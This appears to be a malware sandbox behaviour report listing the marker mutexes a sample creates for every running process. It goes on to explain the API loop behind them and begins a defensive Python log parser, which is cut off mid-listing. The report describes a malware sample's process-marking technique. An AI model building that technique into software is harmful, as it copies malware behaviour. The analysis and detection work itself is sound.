        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1252_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\sppsvc.exeM_1804_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2268_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\searchapp.exeM_4984_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6624_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6612_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_776_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2528_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6680_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_5000_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\upfc.exeM_4908_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_5296_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\uxJLpe1m
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_4872_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2616_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\services.exeM_620_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_4248_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6560_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1496_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1840_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6584_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_752_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6192_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6180_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\registryM_92_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\backgroundtaskhost.exeM_3452_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2488_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_7160_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_872_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_7040_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2748_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_7064_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3456_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6488_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_5728_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6464_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\wmiprvse.exeM_5860_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_732_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4468_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\applicationframehost.exeM_5736_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1948_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\officeclicktorun.exeM_2552_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_7080_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_2908_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_1760_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_592_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6752_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6776_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6384_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1652_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_5544_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1296_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\dashost.exeM_3404_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_5984_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_5548_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2632_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_4108_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3528_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6656_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1176_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\wmiadap.exeM_3716_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6632_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6264_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\winstore.app.exeM_2524_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_3332_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1328_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1316_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2388_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_7732_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6916_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_5108_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6536_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1044_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2648_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6960_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2624_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6512_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_7136_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_364_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_1532_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2012_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2036_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4196_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6416_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\sihost.exeM_3420_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_3604_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_1904_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6840_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_7016_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\sgrmbroker.exeM_3980_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_1928_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\wmiprvse.exeM_5460_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1956_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2152_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2544_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\memory compressionM_1476_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6704_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6728_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_5704_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6300_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_5116_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1200_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_2564_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_2540_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2828_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6392_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1824_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\shellexperiencehost.exeM_7460_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\startmenuexperiencehost.exeM_4660_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\winlogon.exeM_552_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_1376_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_5100_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3536_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_5572_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_1352_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6228_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2900_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\wmiprvse.exeM_4504_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\lsass.exeM_628_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1552_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\audiodg.exeM_4920_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_408_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6260_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_7592_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2396_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4600_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6948_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_356_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6900_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\dllhost.exeM_6284_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6992_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\dllhost.exeM_2288_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3768_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_3548_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6872_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\rhxjqgogfb.exeM_7300_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\explorer.exeM_2580_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6480_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6020_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1940_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3816_
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:120:WilError_03
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6700_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6368_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6344_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6320_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6332_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_920_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\textinputhost.exeM_3788_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_3484_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1408_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\conhost.exeM_3688_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_696_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_4124_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_2056_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\useroobebroker.exeM_3924_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6248_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_5092_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1572_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\smartscreen.exeM_5584_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2508_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1724_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\smss.exeM_324_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2784_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6968_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_784_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_1076_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_1800_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_4624_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6920_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2216_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_2336_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1488_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_2312_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6552_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6196_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_7108_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1084_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2608_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\wininit.exeM_484_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2064_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_3632_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3304_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6848_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\systemsettings.exeM_6060_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6800_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\dwm.exeM_988_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\spoolsv.exeM_1932_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6824_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\ctfmon.exeM_3832_
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe | Mutant created: \Sessions\1\BaseNamedObjects\kgtxkwcmetrjhvgbwwub.exeM_6444_
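The API chain reported for function 0_2_00902514 (CreateToolhelp32Snapshot, Process32First/Process32Next, CharLowerA, wsprintfA, CreateMutexA, GetLastError, ReleaseMutex, CloseHandle) and the mutant names above describe one loop: the sample walks the process list, lower-cases each image name, formats it as <image>M_<pid>_ and creates a mutex under that name. CreateMutexA followed by GetLastError is the usual way to learn whether the name already existed (ERROR_ALREADY_EXISTS, value 183), so every iteration both marks a process and tests whether it was marked earlier. Two names in the list fall outside that scheme: uxJLpe1m, created by the sample itself, and Local\SM0:7308:120:WilError_03, which conhost.exe (PID 7308, matching the conhost.exeM_7308_ marker) created for itself and which is not the sample's doing. The Python below is an added example and is not code from the report or from Joe Sandbox: it parses "Mutant created" rows of this shape, splits marker names into image name and PID, and flags any process that stamped markers for many distinct PIDs. The log lines are constructed from a subset of the names listed above, and the min_pids threshold is an assumed tuning value.

```python
"""Parse per-process marker mutexes out of a sandbox behaviour log.

Added example, not part of the Joe Sandbox report. SAMPLE_LOG is constructed
from a subset of the report's mutant names; the min_pids threshold in
flag_marker_sweeps() is an assumption, not a documented value.
"""
import re
from collections import defaultdict

# Constructed sample rows in the report's "Source | Mutant created" shape.
SAMPLE_LOG = """\
Source: C:\\Users\\user\\Desktop\\RHxJqGoGFB.exe | Mutant created: \\Sessions\\1\\BaseNamedObjects\\dllhost.exeM_5484_
Source: C:\\Users\\user\\Desktop\\RHxJqGoGFB.exe | Mutant created: \\Sessions\\1\\BaseNamedObjects\\svchost.exeM_4032_
Source: C:\\Users\\user\\Desktop\\RHxJqGoGFB.exe | Mutant created: \\Sessions\\1\\BaseNamedObjects\\csrss.exeM_492_
Source: C:\\Users\\user\\Desktop\\RHxJqGoGFB.exe | Mutant created: \\Sessions\\1\\BaseNamedObjects\\memory compressionM_1476_
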